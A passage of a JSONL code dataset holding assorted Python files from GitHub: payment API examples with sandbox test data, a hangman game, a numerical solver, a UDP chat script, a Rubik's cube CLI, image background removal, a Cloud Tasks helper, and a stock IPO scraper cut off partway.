%r' % (resp))\ntoken_id = resp.id\n\n######################\n# TODO REMOVE THIS\n######################\n\ndata = {\n \"card\": {\n \"number\": 4508750015741019,\n \"exp_month\": 12,\n \"exp_year\": 21,\n \"cvc\": 124,\n \"name\": \"test token\",\n \"address\": {\n \"country\": \"Kuwait\",\n \"line1\": \"Salmiya, 21\",\n \"city\": \"Kuwait city\",\n \"street\": \"Salim\",\n \"avenue\": \"Gulf\"\n }\n },\n \"client_ip\": \"192.168.1.20\"\n}\n\nresp = 
tap.Token.create(**data)\nprint('Success: %r' % (resp))\nnew_card_token_id = resp.id\n\n######################\n# Customer Creation\n######################\n\ndata = {\n \"first_name\": \"test\",\n \"last_name\": \"test\",\n \"email\": \"test@test.com\",\n \"nationality\": \"Moroccan\",\n \"currency\": \"MAD\"\n}\n\nresp = tap.Customer.create(**data)\ncustomer_id = resp.id\n\n######################\n# Create Card\n######################\nresp = tap.Customer.create_card(resp.id, **{'source': token_id})\ncard_id = resp.id\n\n######################\n# retrieve Card\n######################\n\ntap.Customer.retrieve_card(customer_id, card_id)\n\n######################\n# list Card\n######################\n\ntap.Customer.list_cards(customer_id)\n\n######################\n# Create Charge\n######################\ndata = {\n \"amount\": 10,\n \"currency\": \"KWD\",\n \"customer\": {\n \"id\": customer_id\n },\n \"source\": {\n \"id\": \"src_all\"\n },\n \"post\": {\n \"url\": \"http://your_website.com/post_url\"\n },\n \"redirect\": {\n \"url\": \"http://your_website.com/redirect_url\"\n }\n}\n\nresp = tap.Charge.create(**data)\nprint('Success: %r' % (resp))\n","repo_name":"obytes/tap-python","sub_path":"examples/card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"20629425707","text":"\"\"\"\nFile: hangman.py\n-----------------------------\nThis program plays hangman game.\nUsers sees a dashed word, trying to\ncorrectly figure the un-dashed word out\nby inputting one character each round.\nIf the user input is correct, show the\nupdated word on console. Players have N_TURNS\nto try in order to win this game.\n\"\"\"\n\n\nimport random\n\n\n# This constant controls the number of guess the player has\nN_TURNS = 7\nALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n\n\ndef main():\n \"\"\"\n Function: Plays hangman game.\n Principle: Input letters, judge whether it is the answer,\n and make a corresponding response\n (answer correct > continue, answer incorrect > deduct blood)\n until all guesses are correct or the blood volume is zero.\n \"\"\"\n ans = random_word()\n print(hand_game(ans) + '\\nThe word was: ' + ans)\n\n\ndef hand_game(ans):\n '''\n Function: Execute until all guesses are correct or the blood volume is zero.\n :param ans: str,Answer word\n :return: str,Game result\n '''\n\n '''\n Initialization:\n hp: int,Can guess the number of wrong chances\n ans_len: int,Answer word count\n right_num: int,Number of correct words\n now_ans: str,Now answer (ex:____)\n log_guess: str,History answer\n '''\n hp = N_TURNS\n ans_len = len(ans)\n right_num = 0\n log_guess = ''\n now_ans = ''\n for i in range(ans_len):\n now_ans += '_'\n\n '''\n End conditions: \n 1. The number of guesses = number of letters. \n 2. 
HP returns to zero.\n    '''\n    while True:\n        if right_num == ans_len:\n            return 'You win!!'\n        elif hp == 0:\n            return 'You are completely hung : ('\n        else:\n            print('The word looks like: ' + now_ans)\n            print('You have ' + str(hp) + ' guesses left.')\n            guess = input('Your guess: ').upper()\n\n            # ALPHABET holds every legal letter; anything outside it is invalid input.\n            if ALPHABET.find(guess) == -1:\n                print('')\n            else:\n                # log_guess holds every previous guess; repeating one is invalid input.\n                if log_guess.find(guess) != -1:\n                    print('')\n                else:\n                    if ans.find(guess) == -1:\n                        log_guess += guess\n                        hp -= 1\n                        print('There is no ' + guess + '\\'s in the word.')\n                    else:\n                        log_guess += guess\n                        for i in range(ans_len):\n                            if ans[i] == guess:\n                                now_ans = now_ans[:i] + guess + now_ans[i + 1:]\n                                right_num += 1\n\n\ndef random_word():\n    num = random.choice(range(9))\n    if num == 0:\n        return \"NOTORIOUS\"\n    elif num == 1:\n        return \"GLAMOROUS\"\n    elif num == 2:\n        return \"CAUTIOUS\"\n    elif num == 3:\n        return \"DEMOCRACY\"\n    elif num == 4:\n        return \"BOYCOTT\"\n    elif num == 5:\n        return \"ENTHUSIASTIC\"\n    elif num == 6:\n        return \"HOSPITALITY\"\n    elif num == 7:\n        return \"BUNDLE\"\n    elif num == 8:\n        return \"REFUND\"\n\n\n##### DO NOT EDIT THE CODE BELOW THIS LINE #####\nif __name__ == '__main__':\n    main()\n","repo_name":"Tsai-nono/py-projects","sub_path":"repository/hangman_game/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"42430189041","text":"\"\"\" Solver module with the solvers available for the problem.\nRunning this file runs the 'Testing Unit' to test the functions.\"\"\"\n\n\n# Importing modules\n\nimport numpy as np\nfrom objective_function import get_J, get_U, vector_U\nimport time\nimport tools\n\n\n# Define Functions\n\n\ndef get_X(tensor_U, k, X0):\n    \"\"\" Calculate X(k-1)\n    tensor_U is the tensor (N,n,3,3) we calculate from the vector_U function\n    X0: initial condition\n    k: index for theta \"\"\"\n\n    if k != 0:\n        tensor_U_X = tensor_U[:, k-1::-1, :, :]  # slice tensor U from 0 to k-1\n        X = tools.np_multi_matmul(tensor_U_X, axis=1) @ X0\n    else:\n        X = X0  # for theta[0]\n    return X\n\n\ndef get_Y(tensor_U, k, Yt):\n    \"\"\" Calculate Y(k+1)\n    tensor_U is the tensor (N,n,3,3) we calculate from the vector_U function\n    Yt: target condition\n    k: index for theta \"\"\"\n\n    if k+1 != tensor_U.shape[1]:\n        tensor_U_Y = tensor_U[:, -1:k:-1, :, :]  # slice tensor U from n to k+1\n        Y = Yt @ tools.np_multi_matmul(tensor_U_Y, axis=1)\n    else:\n        Y = Yt  # for theta[n]\n    return Y\n\n\ndef get_e_k(tensor_U, k, Yt, X0):\n    \"\"\" Calculate e\n    Cross product of X, Y summed over w\n    tensor_U is the tensor (N,n,3,3) we calculate from the vector_U function\n    X0: initial condition\n    Yt: target condition\n    k: index for theta\"\"\"\n\n    X_k = get_X(tensor_U = tensor_U, k= k, X0= X0)\n    Y_k = get_Y(tensor_U = tensor_U, k= k, Yt= Yt)\n    e = sum(np.cross(X_k, Y_k))\n    return e\n\n\ndef update_theta(tensor_U, theta, Yt, X0):\n    \"\"\" Update theta\n    tensor_U is the tensor (N,n,3,3) we calculate from the vector_U function\n    X0: initial condition\n    Yt: target condition\n    theta: phase angles\"\"\"\n\n    theta_updated = np.zeros(theta.shape)  # preallocate the result array\n\n    for count in range(len(theta)):\n        e = get_e_k(tensor_U = tensor_U, k= count, Yt= Yt, X0= X0)  # get e for every theta\n        np.seterr(divide='ignore')  # ignore the initial divide-by-zero error\n        theta_updated[count] = np.arctan(e[0,1] / 
e[0,0])  # calculate updated theta\n    return theta_updated\n\n\ndef standard_solver(theta, w, N, dt, OMEGA_x, OMEGA_y, OMEGA_z, X0, Yt):\n    \"\"\" Solve the model\n    theta = list(n) of theta values\n    w = random frequencies\n    N = number of random frequencies wj over [B, -B]\n    dt = time interval\n    OMEGA_x, OMEGA_y, OMEGA_z: initial condition 3x3 matrices\n    \"\"\"\n\n    tensor_U = vector_U(theta_k =theta, wj = w, dt = dt, OMEGA_x = OMEGA_x, OMEGA_y = OMEGA_y, OMEGA_z = OMEGA_z)\n    J = sum(Yt @ tools.np_multi_matmul(tensor_U, axis=1) @ X0) / N\n    print('Trial #0: J=', J)\n    iter_n = 0\n    # iterate until J converges or the iteration budget runs out\n    while (J < 0.999) and (iter_n < 1000):\n        start_time = time.time()\n        theta = update_theta(tensor_U, theta, Yt= Yt, X0= X0)\n        tensor_U = vector_U(theta_k =theta, wj = w, dt = dt, OMEGA_x = OMEGA_x, OMEGA_y = OMEGA_y, OMEGA_z = OMEGA_z)\n        J = sum(Yt @ tools.np_multi_matmul(tensor_U, axis= 1) @ X0) / N\n        iter_n += 1\n        print('Trial #', iter_n, ': J=', J, ' in ', round(time.time()-start_time, 2), 'seconds\\n')\n\n    return\n\n\n\"\"\" Testing Unit \"\"\"\n\nif __name__ == \"__main__\":\n\n    import tools\n\n    \"\"\" Inputs\n    We shall start with test case parameters\n    \"\"\"\n\n    B = 3\n    T = 20*np.pi\n    N = 300  # number of random frequencies wj over [B, -B]\n    X0 = [0, 0, 1]\n    Yt = [1, 0, 0]\n\n    OMEGA_x = [\n        [0, 0, 0],\n        [0, 0, -1],\n        [0, 1, 0]]\n\n    OMEGA_y = [\n        [0, 0, 1],\n        [0, 0, 0],\n        [-1, 0, 0]]\n\n    OMEGA_z = [\n        [0, -1, 0],\n        [1, 0, 0],\n        [0, 0, 0]]\n\n    OMEGA_x = tools.convert_numpy(OMEGA_x)\n    OMEGA_y = tools.convert_numpy(OMEGA_y)\n    OMEGA_z = tools.convert_numpy(OMEGA_z)\n\n    # convert X0, Yt into numpy arrays (1x3 vectors)\n    X0 = tools.convert_numpy(X0)\n    Yt = tools.convert_numpy(Yt)\n\n    w = tools.get_w(B, N)  # pseudorandom wj\n    n = 20  # assumed number of thetas\n    dt = T/n\n    initial_theta = np.zeros(n)\n    tensor_U = vector_U(theta_k =initial_theta, wj = w, dt = dt, OMEGA_x = OMEGA_x, OMEGA_y = OMEGA_y, OMEGA_z = OMEGA_z)\n\n    print('Testing Function : get_X, get_Y \\n\\\n        test case inputs output =')\n    print('for wj=', w[0])\n    X = get_X(tensor_U, k=3, X0 = X0)\n    print('function: get_x[3]:', X[0], 'norm(X)=', np.linalg.norm(X[0]))\n\n    print()\n    print()\n    Y = get_Y(tensor_U, k=3, Yt = Yt)\n    print('function: get_y[3]:', Y[0], 'norm(Y)=', np.linalg.norm(Y[0]))\n\n    print('Testing Function : get_e_k() \\n\\\n        test case inputs output =')\n    print('function: get_e[3]:'\\\n        , get_e_k(tensor_U= tensor_U, k=3, Yt= Yt, X0= X0))\n\n    print('Testing Function : update_theta() \\n\\\n        test case inputs output =')\n\n    print('function: update_theta(initial_theta):'\\\n        , update_theta(tensor_U = tensor_U, theta= initial_theta, Yt= Yt, X0= X0))\n\n    print('Testing Function : standard_solver() \\n\\\n        test case inputs output =')\n    print('function: standard_solver(initial_theta):'\\\n        , standard_solver(theta= initial_theta, w= w, N= N, dt= dt, OMEGA_x= OMEGA_x, OMEGA_y= OMEGA_y, OMEGA_z= OMEGA_z, X0= X0, Yt= Yt))\n    \"\"\"\n\n    print('choosing theta[10]')\n    J_equ4 = 0\n    for wj in w:\n        X = get_X(theta = initial_theta, k = 10, wj= wj, N = N, dt = dt, OMEGA_x = OMEGA_x, OMEGA_y = OMEGA_y,OMEGA_z = OMEGA_z, X0 = X0)\n        Y = get_Y(theta = initial_theta, k = 10, wj= wj, N = N, dt = dt, OMEGA_x = OMEGA_x, OMEGA_y = OMEGA_y,OMEGA_z = OMEGA_z, Yt = Yt)\n        U = get_U(theta_k= initial_theta[3], wj = wj, dt = dt, OMEGA_x = OMEGA_x, OMEGA_y = OMEGA_y ,OMEGA_z = OMEGA_z)\n        J_equ4 += Y @ U @ X\n    J_equ4 = 1/N * J_equ4\n    J = get_J(theta = initial_theta, w= w, N= N, dt= dt, OMEGA_x= OMEGA_x, OMEGA_y= OMEGA_y, OMEGA_z= OMEGA_z, X0= X0, 
Yt= Yt) \n print('calculating J from equ.3 = ' ,J, '\\ncalculating J from equ.4= ', J_equ4)\n \"\"\"","repo_name":"MagedMohamedTurk/Physical-Model","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":5890,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15212260675","text":"import os\n\n\n# Environment variables for development\nSQUARE_TOKEN_DEV = \"XXXXXX\"\nSQUARE_ENV_DEV = \"sandbox\"\nSQUARE_VERSION_DEV = \"2021-05-13\"\n\n# Environment variables for testing\nSQUARE_TOKEN_TEST = os.environ['SQUARE_TOKEN_TEST']\n# location_id_TEST = os.environ['location_id_TEST'] # optional\nSQUARE_ENV_TEST = \"sandbox\"\nSQUARE_VERSION_TEST = \"2021-05-13\"\n","repo_name":"kefeimo/sam-square-github-actions","sub_path":"squareup_api/squareup_api/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37540218309","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport time\nfrom socket import *\nfrom threading import *\n\n\ndef recive(sock, bufsize):\n while True:\n msg = sock.recvfrom(bufsize)\n msg1, msg2 = msg\n print('\\r>>>{}:{}:{}'.format(\n msg2, time.ctime(), msg1.decode(encoding='utf-8')))\n\n\ndef send(sock, ip_port):\n while True:\n msg = input(\"\\r<<<\")\n sock.sendto(msg.encode(encoding='utf-8'), ip_port)\n\n\ndef main():\n ip = ''\n port = 8899\n ip_port = (ip, port)\n bufsize = 1024\n sersocket = socket(AF_INET, SOCK_DGRAM)\n sersocket.bind(ip_port)\n\n ip1 = '10.115.28.17'\n port1 = 7788\n ip_port1 = (ip1, port1)\n\n threads1 = Thread(target=recive, args=(sersocket, bufsize))\n threads2 = Thread(target=send, args=(sersocket, ip_port1))\n threads1.start()\n threads2.start()\n threads1.join()\n threads2.join()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ningyanke/book_p3","sub_path":"socket/code/线程udp服务端.py","file_name":"线程udp服务端.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33882813565","text":"from argparse import ArgumentParser\nfrom rubik.cube import Cube\nfrom rubik.kociembasolver import KociembaSolver\nfrom rubik.printer import print_cube\n\n\ndef main():\n \"\"\"\n The entry point for the CLI.\n \"\"\"\n parser = ArgumentParser(description=\"Solve a 3x3 Rubik's cube\")\n parser.add_argument(\"cube_str\",\n metavar=\"cube\",\n action=\"store\",\n nargs=\"?\",\n type=str,\n help=\"A 54-character string with the colors of each face of the cube\")\n\n args = parser.parse_args()\n cube_str: str = args.cube_str\n cube: Cube\n\n if cube_str is None:\n print(\"Generating a random cube string...\")\n cube = Cube()\n print(str(cube))\n print()\n elif len(cube_str) != 54:\n print(\"rubik: error: The cube string argument is not 54 characters long.\")\n return\n else:\n try:\n cube = Cube(cube_str)\n except ValueError as e:\n print(f\"rubik: error: {e}\")\n return\n\n # Before solver\n print_cube(cube)\n print()\n\n try:\n solver = KociembaSolver(cube)\n solver.solve()\n except Exception as e:\n print(f\"rubik: error: {e}\")\n return\n\n # After solver\n print()\n print_cube(cube)\n\n\nif __name__ == \"__main__\":\n 
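# Editor's note: a minimal usage sketch, kept as comments so behaviour is unchanged (the exact colour letters the 54-character Cube constructor accepts are an assumption, not confirmed by this file):\n    #   cube = Cube(\"W\"*9 + \"R\"*9 + \"G\"*9 + \"Y\"*9 + \"O\"*9 + \"B\"*9)\n    #   KociembaSolver(cube).solve()\n    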
main()\n","repo_name":"Arvonit/rubik","sub_path":"backend/rubik/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13901340235","text":"import sys\nfrom PyQt6.QtWidgets import *\n\n\nclass DlgMain(QDialog):\n def __init__(self):\n super().__init__()\n self.setWindowTitle('My GUI')\n self.setGeometry(50, 50, 300, 300)\n\n # Tab Widget\n self.main = QHBoxLayout()\n self.tab = QTabWidget(self)\n self.tab.setTabPosition(QTabWidget.tabPosition(self.tab).East)\n self.tab.setMovable(True)\n self.tab.setTabsClosable(True)\n self.tab.tabCloseRequested.connect(self.empty)\n\n self.w1 = QWidget()\n self.w2 = QWidget()\n self.w3 = QWidget()\n self.w4 = QWidget()\n self.w5 = QWidget()\n self.tab.addTab(self.w1, '1')\n self.tab.addTab(self.w2, '2')\n self.tab.addTab(self.w3, '3')\n self.tab.addTab(self.w4, '4')\n self.tab.setTabText(2, 'changed')\n self.tab.insertTab(2, self.w5, '5')\n self.main.addWidget(self.tab)\n\n # QList Widgets\n\n def empty(self):\n pass\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n main = DlgMain()\n main.show()\n sys.exit(app.exec())\n\n","repo_name":"throwmeister/gui_experiments","sub_path":"guis/syntax_advanced.py","file_name":"syntax_advanced.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19119542163","text":"def add_time(start, duration, setDay=None):\n\tstartHour = int(start[:start.find(\":\")])\n\taddHour = int(duration[:duration.find(\":\")])\n\thours = startHour + addHour\n\t\n\tstartMin = int(start[start.find(\":\")+1:start.find(\"M\")-1])\n\taddMin = int(duration[duration.find(\":\")+1:])\n\tminutes = startMin + addMin\n\t\n\tturn_i = start[-2:]\n\tturn_f = turn_i\n\t\n\tcountDays = hours/24\n\t\n\tweek = [\"Sunday\", \"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\"]\n\t\n\tsumHour = hours\n\tif minutes >= 60:\n\t\thours += 1\n\t\tsumHour = hours\n\t\tcountDays = hours/24\n\t\twhile minutes > 59:\n\t\t\tminutes -= 60\n\t\t\tcontinue\n\tif int(hours/12) % 2 != 0:\n\t\tif turn_i == \"PM\":\n\t\t\tturn_f = \"AM\"\n\t\telse:\n\t\t\tturn_f = \"PM\"\n\twhile hours > 12:\n\t\thours -= 12\n\t\tcontinue\n\t\n\tif setDay == None:\n\t\tnew_time = '{}:{} {}'.format(str(hours), str(minutes).zfill(2), turn_f)\n\t\tif turn_i == \"AM\" and 24 <= sumHour < 48:\n\t\t\tnew_time = '{} (next day)'.format(new_time)\n\t\telif turn_i == \"PM\" and 12 <= sumHour < 36:\n\t\t\tnew_time = '{} (next day)'.format(new_time)\n\t\telif sumHour >=36:\n\t\t\tnew_time = '{} ({} days later)'.format(new_time, round(countDays))\n\telse:\n\t\tday = int(round(countDays) + week.index(setDay.capitalize()))\n\t\tif day >= 6:\n\t\t\twhile day > 6:\n\t\t\t\tday -= 7\n\t\t\t\tcontinue\n\t\t\tday = week[day]\n\t\telse:\n\t\t\tday = week[day]\n\t\t\t\n\t\tnew_time = '{}:{} {}, {}'.format(str(hours), str(minutes).zfill(2), turn_f, day)\n\t\tif turn_i == \"AM\" and 24 <= sumHour < 48:\n\t\t\tnew_time = '{} (next day)'.format(new_time)\n\t\telif turn_i == \"PM\" and 12 <= sumHour < 36:\n\t\t\tnew_time = '{} (next day)'.format(new_time)\n\t\telif sumHour >=36:\n\t\t\tnew_time = '{} ({} days later)'.format(new_time, round(countDays))\n\t\t\t\n\treturn new_time ","repo_name":"KentAugust/my-freeCodeCamp-Projects","sub_path":"Scientific Computing/time 
calculator/time_calculator.py","file_name":"time_calculator.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"17771739178","text":"import datetime\nimport json\nfrom google.cloud.tasks_v2 import CloudTasksClient, HttpMethod\nfrom google.protobuf import duration_pb2, timestamp_pb2\nfrom .config import CreateTaskConfig\n\n\nclass CreateTask:\n    \"\"\"The class contains a method to create a new task on GCP Cloud Tasks.\"\"\"\n\n    def __init__(self, _config: CreateTaskConfig) -> None:\n        self.config = _config\n\n    def create_new_task(self) -> None:\n        \"\"\"Creates a new task on Cloud Tasks.\n\n        Constructs the task with the environment variables input and sends the\n        transaction to Cloud Tasks to create a new task in the queue.\n        \"\"\"\n        # Create a client.\n        client = CloudTasksClient()\n\n        project = self.config.PROJECT\n        queue = self.config.QUEUE\n        location = self.config.LOCATION\n        url = self.config.CLOUD_RUN_URL\n        payload = None\n        in_seconds = self.config.IN_SECONDS\n        task_name = None\n        deadline = self.config.DEADLINE\n        audience = self.config.AUDIENCE\n        service_account_email = self.config.SERVICE_ACCOUNT_DETAIL\n\n        # Construct the fully qualified queue name.\n        parent = client.queue_path(project, location, queue)\n\n        # Construct the request body.\n        task = {\n            \"http_request\": {  # Specify the type of request.\n                \"http_method\": HttpMethod.POST,\n                \"url\": url,  # The full url path that the task will be sent to.\n                \"oidc_token\": {\n                    \"service_account_email\": service_account_email,\n                    \"audience\": audience,\n                },\n            }\n        }\n\n        if payload is not None:\n            if isinstance(payload, dict):\n                # Convert dict to JSON string\n                payload = json.dumps(payload)\n                # specify http content-type to application/json\n                task[\"http_request\"][\"headers\"] = {\"Content-type\": \"application/json\"}\n\n            # The API expects a payload of type bytes.\n            converted_payload = payload.encode()\n\n            # Add the payload to the request.\n            task[\"http_request\"][\"body\"] = converted_payload\n\n        if in_seconds is not None:\n            # Convert \"seconds from now\" into an rfc3339 datetime string.\n            d = datetime.datetime.utcnow() + datetime.timedelta(seconds=in_seconds)\n\n            # Create Timestamp protobuf.\n            timestamp = timestamp_pb2.Timestamp()\n            timestamp.FromDatetime(d)\n\n            # Add the timestamp to the tasks.\n            task[\"schedule_time\"] = timestamp\n\n        if task_name is not None:\n            # Add the name to tasks.\n            task[\"name\"] = client.task_path(project, location, queue, task_name)\n\n        if deadline is not None:\n            # Add dispatch deadline for requests sent to the worker.\n            duration = duration_pb2.Duration()\n            duration.FromSeconds(deadline)\n            task[\"dispatch_deadline\"] = duration\n\n        # Use the client to build and send the task.\n        response = client.create_task(request={\"parent\": parent, \"task\": task})\n\n        print(\"Created task {}\".format(response.name))\n","repo_name":"bandprotocol/vrf-worker-v1","sub_path":"app/helpers/create_task.py","file_name":"create_task.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"21646277950","text":"import os\nimport sys\nimport cv2\nimport time\nimport numpy as np\n\nfrom keras.models import Model, load_model\n## Use the GPU\nfrom keras import backend as K\nK.tensorflow_backend._get_available_gpus()\n\n\n## Merge the original image with the predicted mask to strip the background\n## imgPath : the input image (a BGR array; loading from a file path is left commented out below)\n## model : the trained model\ndef removeBackground(imgPath, model):\n    # imgOrg = cv2.imread(imgPath)  # original path-based loading, kept for reference\n    imgOrg = imgPath\n    # note: shape[:2] is (rows, cols); the swapped names cancel out in the resize call below\n    width, height = imgOrg.shape[:2]\n    img = cv2.resize(imgOrg, (256, 256))\n    img = img.astype(np.float32) / 255.0\n    img = np.expand_dims(img, axis=0)\n    mask = model.predict(img)\n    mask = (mask > 0.5).astype(np.uint8)  ### sigmoid outputs lie in 0~1, so take 0.5 as the cut-off\n    mask = np.squeeze(mask)  #### squeeze the mask (256,256,1) -> (256,256)\n    mask = cv2.resize(mask, (height, width), interpolation=cv2.INTER_CUBIC)\n    b,g,r = cv2.split(imgOrg) # get b,g,r\n    imgOrg = cv2.merge([r,g,b]) # switch it to rgb\n    remove = cv2.bitwise_and(imgOrg, imgOrg, mask= mask)\n    b,g,r = cv2.split(remove)\n    remove = cv2.merge([r,g,b])\n    return remove\n    # cv2.imshow('Original', imgOrg)\n    # cv2.imshow('Remove', remove)\n    # cv2.waitKey(0)\n    # plt.figure(figsize=(15,15))\n    # plt.subplot(121)\n    # plt.grid(False)\n    # plt.imshow(imgOrg)\n    # plt.subplot(122)\n    # plt.grid(False)\n    # plt.imshow(remove)\n\n################ Composite the segmented foreground onto a background ################\ndef MergeBackground(foreground, background, maskPath):\n    # Read the images (maskPath is already a mask array here; path-based loading was dropped)\n    mask = maskPath\n    _, alpha = cv2.threshold(mask, 0, 255, cv2.THRESH_BINARY)\n    background = cv2.resize(background, (foreground.shape[1], foreground.shape[0]),\n                            interpolation=cv2.INTER_CUBIC)\n\n    # Convert uint8 to float\n    foreground = foreground.astype(float)\n    background = background.astype(float)\n\n    # Normalize the alpha mask to keep intensity between 0 and 1\n    alpha = alpha.astype(float)/255.0\n\n    # Multiply the foreground with the alpha matte\n    foreground = cv2.multiply(alpha, foreground)\n\n    # Multiply the background with ( 1 - alpha )\n    background = cv2.multiply(1.0 - alpha, background)\n\n    # Add the masked foreground and background.\n    outImage = cv2.add(foreground, background)\n\n    outImage = outImage/255\n    saveImg = np.zeros((foreground.shape[0], foreground.shape[1], 3))\n    cv2.normalize(outImage, saveImg, 0, 255, cv2.NORM_MINMAX)\n    # b,g,r = cv2.split(saveImg)\n    # saveImg = cv2.merge([r,g,b])\n    saveImg = saveImg.astype(np.uint8)\n    # cv2.imwrite('tt.png', saveImg)\n    return saveImg\n    # print(outImage.shape)\n\n    # # Display image\n    # plt.imshow(outImage)\n    # cv2.imwrite('tt.png', saveImg)\n\n\n#################### Turn the black background transparent ####################\ndef BlackBackgroundToTransparent(imgPath, savePath):\n    image = cv2.imread(imgPath)\n    # image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n    image = cv2.cvtColor(image, cv2.COLOR_BGR2BGRA)\n    image[np.all(image == [0, 0, 0, 255], axis=2)] = [0, 0, 0, 0]\n    cv2.imwrite(savePath, image)\n\n# def imageDetection(img):\n#     m = 0\n#     if (img.shape[0] % 2) != 0:\n#         m = np.insert(img, 0, values=0, axis=0)\n#     elif (img.shape[1] % 2) != 0:\n#         m = np.insert(img, 0, values=0, axis=1)\n#     elif img.shape[1] % 2 == 0 and img.shape[0] % 2 == 0:\n#         m = img\n#     return m","repo_name":"YochLin/NTUT_HW","sub_path":"ADIP/Remove.py","file_name":"Remove.py","file_ext":"py","file_size_in_byte":3511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"30941368552","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/6/28 23:15\n# @File : aastock_new_stock.py\n# @Author : Rocky C@www.30daydo.com\n\n\n'''\nhttp://www.aastocks.com/sc/stocks/market/ipo/listedipo.aspx?s=3&o=0&page=20\n'''\n\nimport time\nfrom parsel import Selector\nfrom selenium import webdriver\nimport sys\n\nsys.path.append('..')\nimport datetime\nfrom common.BaseService import BaseService\nfrom configure.settings import DBSelector\n\npath = 
r'C:\\OneDrive\\Python\\selenium\\chromedriver.exe'\n\n\nclass AAStockNewStock(BaseService):\n\n def __init__(self):\n super(AAStockNewStock, self).__init__('../log/aastock.log')\n self.conn = DBSelector().get_mysql_conn('db_stock')\n self.cursor = self.conn.cursor()\n\n def create_table(self):\n sql = '''CREATE TABLE IF NOT EXISTS `tb_hk_new_stock` (\n `id` int(11) NOT NULL AUTO_INCREMENT PRIMARY KEY ,\n `name` varchar(50) DEFAULT NULL,\n `code` varchar(10) NOT NULL,\n `issue_date` date DEFAULT NULL,\n `each_hand_stock` varchar(50) DEFAULT NULL,\n `share_value_Yi` varchar(50) DEFAULT NULL,\n `margin_price` varchar(50) DEFAULT NULL,\n `price` float(255,4) DEFAULT NULL,\n `over_price_part` varchar(50) DEFAULT NULL,\n `hit_least_num` int(255) DEFAULT NULL,\n `hit_ratio` float(255,4) DEFAULT NULL,\n `current_price` float(255,4) DEFAULT NULL,\n `first_day_raise` float(255,4) DEFAULT NULL,\n `accumulate_raise` float(255,4) DEFAULT NULL,\n `crawltime` DATETIME DEFAULT NULL,\n UNIQUE INDEX code_ix(`code` ASC)\n ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4'''\n\n try:\n self.cursor.execute(sql)\n except Exception as e:\n print(e)\n self.conn.rollback()\n else:\n self.conn.commit()\n\n def fetch(self, page):\n options = webdriver.ChromeOptions()\n options.add_experimental_option('excludeSwitches', ['enable-automation'])\n prefs = {'profile.managed_default_content_settings.images': 2}\n options.add_experimental_option('prefs', prefs)\n options.add_argument(\n '--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36')\n driver = webdriver.Chrome(executable_path=path,\n chrome_options=options)\n driver.implicitly_wait(40)\n\n url = 'http://www.aastocks.com/sc/stocks/market/ipo/listedipo.aspx?s=3&o=0&page={}'\n for p in range(1, page + 1):\n driver.get(url.format(p))\n time.sleep(5)\n yield driver.page_source\n\n def convert_float(self, data):\n if data is None:\n print('数据为空')\n return None\n data = data.strip().replace('%', '').replace(',', '')\n\n try:\n print('解析后')\n print(data)\n data = float(data)\n\n except Exception as e:\n if data != 'N/A':\n print('解析异常')\n print(data)\n data = None\n return data\n\n def convert_date(self, data_str):\n try:\n date = datetime.datetime.strptime(data_str, '%Y/%m/%d')\n except Exception as e:\n print(e)\n date = None\n\n return date\n\n def convert_hand_int(self, data):\n try:\n data = int(data.strip().replace('手', ''))\n except:\n data = None\n return data\n\n def parse(self, content):\n response = Selector(text=content)\n ipo_list = response.xpath('//div[@id=\"IPOListed\"]/table/tbody/tr')\n insert_sql = '''insert into `tb_hk_new_stock` (`name`,`code`,`issue_date`,`each_hand_stock`,`share_value_Yi`,`margin_price`,`price`,`over_price_part`,`hit_least_num`,`hit_ratio`,`current_price`,`first_day_raise`,`accumulate_raise`,`crawltime`)\n VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s) ON DUPLICATE KEY UPDATE `crawltime`=%s'''\n\n for ipo_item in ipo_list:\n item_list = ipo_item.xpath('.//td')\n if len(item_list) < 2:\n continue\n name = item_list[1].xpath('.//a[1]/text()').extract_first()\n code = item_list[1].xpath('.//a[2]/text()').extract_first()\n issue_date = self.convert_date(item_list[2].xpath('.//text()').extract_first())\n each_hand_stock = item_list[3].xpath('.//text()').extract_first()\n share_value_Yi = item_list[4].xpath('.//text()').extract_first()\n margin_price = item_list[5].xpath('.//text()').extract_first()\n price = 
